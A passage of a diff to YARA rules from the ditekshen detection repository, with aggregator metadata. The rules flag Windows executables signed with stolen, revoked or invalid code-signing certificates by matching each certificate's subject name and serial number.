+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L928-L939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e646346d94791c2a86a7240d4cf1f9138a30ca583b021ae5b17471cef20a98de"
+		logic_hash = "063a8b361e9fc91619912109427f6a0cbc7755e85dae820ea0f16709ac580ed1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8d658fd671fa097c3db18906a29e8c1fa45113d9"
+		thumbprint = "1078c0ab5766a48b0d4e04e57f3ab65b68dd797f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\x02C\\x02\\x97\\x04\\x17\\x04\\x1e\\x04.\\x02\\x90\\x00g\\x02\\x94\\x02\\xae\\x00p\\x04 \\x00K\\x04J\\x02\\x88\\x042\\x02K\\x02\\xa3" and pe.signatures [ i ] . serial == "eb:95:a7:bd:75:53:53:3d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUN & STARZ LIMITED" and pe.signatures [ i ] . serial == "29:a2:48:a7:7d:5d:40:66:fe:5d:a7:5f:32:10:2b:b5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0A1F3A057A1Dce4Bf7D76D0C7Adf837E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3A9Bdec10E00E780316Baaebfe7A772C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c4829ec0-b6be-5701-a4cf-e4b1205240b3"
+		id = "0879b4f7-4058-5391-b8bf-90a46ef337f6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6172-L6184"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L941-L952"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "2df05a70d3ce646285a0f888df15064b4e73034b67e06d9a4f4da680ed62e926"
-		logic_hash = "de9ae66e497730db54fc21a745426c687c3a4d9819c08bc1dca0b42a5b8070ac"
+		logic_hash = "f1c0d23c9aa2ff705e3350e15b7ff83fc007ce6aaa57c4ed59201f3022f5d00a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8279b87c89507bc6e209a7bd8b5c24b31fb9a6dc"
+		thumbprint = "981b95ffcb259862e7461bc58516d7785de91a8a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Qihu Technology Co., Ltd." and pe.signatures [ i ] . serial == "0a:1f:3a:05:7a:1d:ce:4b:f7:d7:6d:0c:7a:df:83:7e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00849Ea0945Dd2Ea2Dc3Cc2486578A5715 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_73F9819F3A1A49Bac1E220D7F3E0009B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8584af2e-6b1e-5141-abbf-84e414ffaead"
+		id = "06f448cf-1f0e-5db5-bdb5-30238c5f7341"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6186-L6197"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L954-L965"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "824744510e73cd6717e3626a5a250466bfb5817fd7172fc32466c2e68e20947b"
+		logic_hash = "9244fae0be6c1addbd0c740d7e153fd4109101184bc61375ddadb6d784769010"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c56adfb8fba825aa9a4ab450c71d45b950e55a4"
+		thumbprint = "bb04986cbd65f0994a544f197fbb26abf91228d9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Biglin" and pe.signatures [ i ] . serial == "00:84:9e:a0:94:5d:d2:ea:2d:c3:cc:24:86:57:8a:57:15" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jean Binquet" and pe.signatures [ i ] . serial == "73:f9:81:9f:3a:1a:49:ba:c1:e2:20:d7:f3:e0:00:9b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0537F25A88E24Cafdd7919Fa301E8146 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0989C97804C93Ec0004E2843 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b0dd33b4-2040-5021-bebc-5ca26d75f14c"
+		id = "13b2dd06-878e-5539-91d1-eff8607997c3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6215-L6227"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L967-L978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "72ac61e6311f2a6430d005052dbc0cc58587e7b75722b5e34a71081370f4ddd5"
-		logic_hash = "8cd68612354a756c4a52d6baea9ef6ed74c94f5fcf25baa2f72c1131e0828f84"
+		logic_hash = "65b695eed221db86928ebd32a1f3cb35729754ba41cb2e5b6cf944890d211120"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "922211f5ab4521941d26915aeb82ee728f931082"
+		thumbprint = "98549ae51b7208bda60b7309b415d887c385864b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "05:37:f2:5a:88:e2:4c:af:dd:79:19:fa:30:1e:81:46" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai Hintsoft Co., Ltd." and pe.signatures [ i ] . serial == "09:89:c9:78:04:c9:3e:c0:00:4e:28:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2E4A279Bde2Eb688E8Ab30F5904Fa875 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6Ba32F984444Ea464Bea41D99A977Ea8 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3fd40418-9efe-5dfe-a4e2-01ff9c46a4d5"
+		id = "6fee5b3f-f72e-531e-b11e-e402207072ff"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6229-L6240"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L980-L991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "768b2cb64f7ce359285721bbfd2f2f6aac4065ec234dc091933d962a7f0ab79a"
+		logic_hash = "fcabdd038a2594dffddbfff71a7a8a1abae89c637355b3be7e5f26c1eb9e39c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0cdf4e992af760e59f3ea2f1648804d2a2b47bbc"
+		thumbprint = "ae9e65e26275d014a4a8398569af5eeddf7a472c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lespeed Technology Co., Ltd" and pe.signatures [ i ] . serial == "2e:4a:27:9b:de:2e:b6:88:e8:ab:30:f5:90:4f:a8:75" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JIN CONSULTANCY LIMITED" and pe.signatures [ i ] . serial == "6b:a3:2f:98:44:44:ea:46:4b:ea:41:d9:9a:97:7e:a8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Fbe6758Ae785D7C678A4Ad8De5C3F7E6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4F5A9Bf75Da76B949645475473793A7D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4d080acc-fb11-5e4d-9c59-562f30376936"
+		id = "094b56b9-15fc-5366-9023-c706613882c4"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6242-L6253"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L993-L1004"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c6d84435c5c4f71696ce0414c87216bbb0603cb75d6e37abaf73e3708904032e"
+		logic_hash = "8f00efcd62a934fb6ec0205dc1d7bb7f7f3ab168150fee942536ef92f686d21d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bd1958f0306fc8699e829541cd9b8c4fe0e0c6da920932f2cd4d78ed76bda426"
+		thumbprint = "f7de21bbdf5effb0f6739d505579907e9f812e6f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HORUM" and pe.signatures [ i ] . serial == "fb:e6:75:8a:e7:85:d7:c6:78:a4:ad:8d:e5:c3:f7:e6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00A73B6D821F84Db4451D6Eedd62C42848 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_68B050Aa3D2C16F77E14A16Dc8D1C1Ac : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c7533bc5-7d83-550e-a36c-eb459f2be842"
+		id = "b49d3f1d-34b4-578e-ab36-b0744deef548"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6255-L6266"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1006-L1017"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "448527bcbe2851bffefabe06a58e3ca68c092a2080041c51acacad3d5119aa0c"
+		logic_hash = "9de23897fbfe3c4a6d649558d1d71f890117ec80967bc5bd975aa6f33576c702"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "eca61ad880741629967004bfc40bf8df6c9f0794"
+		thumbprint = "c757e09e7dc5859dbd00b0ccfdd006764c557a3d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mht Holding Vinderup ApS" and pe.signatures [ i ] . serial == "00:a7:3b:6d:82:1f:84:db:44:51:d6:ee:dd:62:c4:28:48" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW POKE LTD" and pe.signatures [ i ] . serial == "68:b0:50:aa:3d:2c:16:f7:7e:14:a1:6d:c8:d1:c1:ac" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_500D76B1B4Bfaf4A131F027668Fea2D3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0F2B44E398Ba76C5F57779C41548607B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "670138fc-7f2f-5145-8488-196912292ef7"
+		id = "6a962fd8-c2cd-5abd-8f80-95697771037c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6268-L6279"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1019-L1030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4f626e5ae9d273723814b0d944b067e70714e10776600a1bd0f90af31c1146a"
+		logic_hash = "172622595a3f6a6ab4ac2677c3064fab87b0a872c261031331c99cbd58671da2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fa491e71d98c7e598e32628a6272a005df86b196"
+		thumbprint = "cef53e9ca954d1383a8ece037925aa4de9268f3f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FviSBJQX" and pe.signatures [ i ] . serial == "50:0d:76:b1:b4:bf:af:4a:13:1f:02:76:68:fe:a2:d3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DR" and pe.signatures [ i ] . serial == "0f:2b:44:e3:98:ba:76:c5:f5:77:79:c4:15:48:60:7b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_54Cd7Ae1C27F1421136Ed25088F4979A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Ad4Ce116B131Daf8D784C6Fab2Ea1F1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2f7a0a34-6650-59d1-acf9-5ded0317ee6f"
+		id = "abb6c51b-987a-5a1f-9d31-1422b41a6a6d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6281-L6292"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1032-L1043"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b94ccd7f85a2b21edaf4b28f14827b399cdb82307c20320f77eb775c05751f1"
+		logic_hash = "3221ffd8203cbef8735ed48acd77daae6bee33ade236b1ff2ced81a0f27d4ce5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "acde047c3d7b22f87d0e6d07fe0a3b734ad5f8ac"
+		thumbprint = "de2dad893fdd49d7c0d498c0260acfb272588a2b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORDARA LTD" and pe.signatures [ i ] . serial == "5a:d4:ce:11:6b:13:1d:af:8d:78:4c:6f:ab:2e:a1:f1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_65Efa92A4164A3A2D888B5Cf8Ff073C8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_48Ce01Ac7E137F4313Cc5723Af817Da0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "07392a87-7d81-58c1-8dd6-2a9cbc8caa6b"
+		id = "d5eb08a7-eb2b-5318-a941-da3ce0a6b634"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6294-L6305"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1045-L1056"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "189f154d5b71bea9c06cd2c79d2460a1fb8cc9e0670a9ef8545e3abad80c8a06"
+		logic_hash = "d92d4aa491b028620f17fd997a782f5e75247b2d3de7ef9026e2c62309275ce1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "928246cd6a0ee66095a43ae06a696b4c63c6ac24"
+		thumbprint = "8f594f2e0665ffd656160aac235d8c490059a9cc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghisler Software GmbH" and pe.signatures [ i ] . serial == "65:ef:a9:2a:41:64:a3:a2:d8:88:b5:cf:8f:f0:73:c8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ET HOMES LTD" and pe.signatures [ i ] . serial == "48:ce:01:ac:7e:13:7f:43:13:cc:57:23:af:81:7d:a0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ad0A958Cdf188Bed43154A54Bf23Afba : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C7E62986C36246C64B8C9F2348141570 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0b42f6fd-732c-5802-b616-774a1da9e3aa"
+		id = "44d75e1d-5d5b-5d6f-8f7b-d94cd3908ed7"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6307-L6321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1058-L1069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6031cb276cbb419789a3f3e57654dd9569feb612b0aebc2b72ae8b644f07bca9"
+		logic_hash = "dfb669ad42ac16d954405dc243b9d81dd9a748a14044d1fce3b71b490c58c82e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7d851e785ad44eb15d5cdf9c33e10fe8f49616e8"
+		thumbprint = "f779e06266802b395ef6d3dbfeb1cc6a0a2cfc47"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "c7:e6:29:86:c3:62:46:c6:4b:8c:9f:23:48:14:15:70" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_05Abac07F8D0Ce567F7D75Ee047Efee2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ee663737D82Df09C7038A6A6693A8323 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "17355de3-08a9-585d-bc4f-fd16ff59e2a2"
+		id = "c6684a9f-ca92-53e9-9723-9d2437a16fc6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6323-L6334"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1086-L1097"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0196ebd0b5821863c99676907a972e214f46411650fe20557e9f919609d12659"
+		logic_hash = "4057374b73ef13b6f101b939e11569cf010896097fd9322ab490c73d6808fa6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "68b32eac87652af4172e40e3764477437e5a5ce9"
+		thumbprint = "dc934afe82adbab8583e393568f81ab32c79aeea"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ultrareach Internet Corp." and pe.signatures [ i ] . serial == "05:ab:ac:07:f8:d0:ce:56:7f:7d:75:ee:04:7e:fe:e2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREACIJA d.o.o." and pe.signatures [ i ] . serial == "00:ee:66:37:37:d8:2d:f0:9c:70:38:a6:a6:69:3a:83:23" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_62165B335C13A1A847Ce9Acff2B29368 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3D568325Dec56Abf48E72317675Cacb7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "62cd9a29-023d-5ff4-89cf-a2e74ec66ac4"
+		id = "e958b9c4-2f1b-5b5d-8a44-7393204a6f41"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6336-L6347"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1099-L1110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19e189c49f435f8b2aca0944d0f648a4126f83b7498982a262230e2f69ada8b7"
+		logic_hash = "a575c9989a3ee7824e8734940877ddb255b19070def460508f70d32f457411ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c4cfd244d5148c5b03cac093d49af723252b643c"
+		thumbprint = "e5b21024907c9115dafccc3d4f66982c7d5641bc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "t55555Prh" and pe.signatures [ i ] . serial == "62:16:5b:33:5c:13:a1:a8:47:ce:9a:cf:f2:b2:93:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Virtual Byte F-B-I" and pe.signatures [ i ] . serial == "3d:56:83:25:de:c5:6a:bf:48:e7:23:17:67:5c:ac:b7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4Cdffb4F02C55Ae60A099652605Da274 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3533080B377F80C0Ea826B2492Bf767B : FILE
 {
 	meta:
-		description = "Enigma Protector Demo Certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "843929be-68e5-56b0-99fc-f5d71b91c3cf"
+		id = "42d2328e-742e-5c35-aa14-3b42442543ce"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6366-L6377"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1127-L1138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1b655f42302bed2091aaa5d37156c68eaf812f0c287bf42b24942a8b845b7476"
+		logic_hash = "a7adb9190be4a9cf60adf4b55c8abaa80e01224ea834fc05705afef37703899e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4a2d33148aadf947775a15f50535842633cc3442"
+		thumbprint = "2afcc4cdee842d80bf7b6406fb503957c8a09b4d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMO" and pe.signatures [ i ] . serial == "4c:df:fb:4f:02:c5:5a:e6:0a:09:96:52:60:5d:a2:74" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA8\\x9C\\xE8\\xBF\\xAA\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xA8\\x9C\\xE5\\x93\\xA6\\xE5\\xB0\\xBA\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xB0\\xBA\\xE5\\xB0\\xBA\\xE8\\xBF\\xAA\\xE5\\x93\\xA6\\xE8\\xBF\\xAA\\xE5\\x8B\\x92\\xD0\\x91\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xD0\\x91" and pe.signatures [ i ] . serial == "35:33:08:0b:37:7f:80:c0:ea:82:6b:24:92:bf:76:7b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_25Ad5Ae68C38Ad1021086F4Ffc8Ba470 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B0Ecd32F95F8761B8A6D5710C7F34590 : FILE
 {
 	meta:
-		description = "Enigma Protector CA Certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6f1c6d3a-72a1-5c70-9c7d-1616b13767cd"
+		id = "2535c9eb-ed4a-52b9-8ad5-80c44c035135"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6379-L6390"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1140-L1151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80b67b804e47fba825fabfee39f9a0aae78a4465b088c28b6f6972acd614bb89"
